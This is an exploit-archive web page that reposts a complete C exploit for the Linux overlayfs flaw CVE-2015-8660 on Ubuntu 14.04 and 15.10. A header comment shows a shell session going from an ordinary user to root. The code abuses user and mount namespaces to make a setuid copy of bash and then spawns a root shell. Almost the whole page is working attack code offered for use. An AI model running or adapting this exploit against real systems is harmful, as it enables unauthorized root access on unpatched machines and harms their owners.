首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Ubuntu 14.04 LTS, 15.10 overlayfs - Local Root Exploit 来源：rebel at pulltheplug.org 作者：rebel 发布时间：2016-01-06   /* just another overlayfs exploit, works on kernels before 2015-12-26   # Exploit Title: overlayfs local root # Date: 2016-01-05 # Exploit Author: rebel # Version: Ubuntu 14.04 LTS, 15.10 and more # Tested on: Ubuntu 14.04 LTS, 15.10 # CVE : CVE-2015-8660   blah@ubuntu:~$ id uid=1001(blah) gid=1001(blah) groups=1001(blah) blah@ubuntu:~$ uname -a && cat /etc/issue Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux Ubuntu 14.04.3 LTS \n \l blah@ubuntu:~$ ./overlayfail root@ubuntu:~# id uid=0(root) gid=1001(blah) groups=0(root),1001(blah)   12/2015 by rebel   6354b4e23db225b565d79f226f2e49ec0fe1e19b */   #include <stdio.h> #include <sched.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sched.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/mount.h> #include <sys/types.h> #include <signal.h> #include <fcntl.h> #include <string.h> #include <linux/sched.h> #include <sys/wait.h>   static char child_stack[1024*1024];   static int child_exec(void *stuff) {     system("rm -rf /tmp/haxhax");     mkdir("/tmp/haxhax", 0777);     mkdir("/tmp/haxhax/w", 0777);     mkdir("/tmp/haxhax/u",0777);     mkdir("/tmp/haxhax/o",0777);       if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {     fprintf(stderr,"mount failed..\n");     }       chmod("/tmp/haxhax/w/work",0777);     chdir("/tmp/haxhax/o");     chmod("bash",04755);     chdir("/");     umount("/tmp/haxhax/o");     return 0; }   int main(int argc, char **argv) {     int status;     pid_t wrapper, init;     int clone_flags = CLONE_NEWNS | SIGCHLD;     struct stat s;       if((wrapper = fork()) == 0) {         if(unshare(CLONE_NEWUSER) != 0)             fprintf(stderr, "failed to create new user namespace\n");           if((init = fork()) == 0) {             pid_t pid =                 clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);             if(pid < 0) {                 fprintf(stderr, "failed to create new mount namespace\n");                 exit(-1);             }               waitpid(pid, &status, 0);           }           waitpid(init, &status, 0);         return 0;     }       usleep(300000);       wait(NULL);       stat("/tmp/haxhax/u/bash",&s);       if(s.st_mode == 0x89ed)         execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);       fprintf(stderr,"couldn't create suid :(\n");     return -1; }   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Rejetto HTTP File Server (HFS) ·D-Link DCS-931L Arbitrary File ·KiTTY Portable <= 0.65.0.2p Lo ·Symantec Endpoint Protection 1 ·KiTTY Portable <= 0.65.0.2p Lo ·Linux Kernel overlayfs Local P ·KiTTY Portable <= 0.65.1.1p Lo ·Amanda <= 3.3.1 - Local Root E ·KiTTY Portable <= 0.65.0.2p Ch ·KeePass Password Safe Classic ·FTPShell Client 5.24 - Buffer ·TrendMicro node.js HTTP Server   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved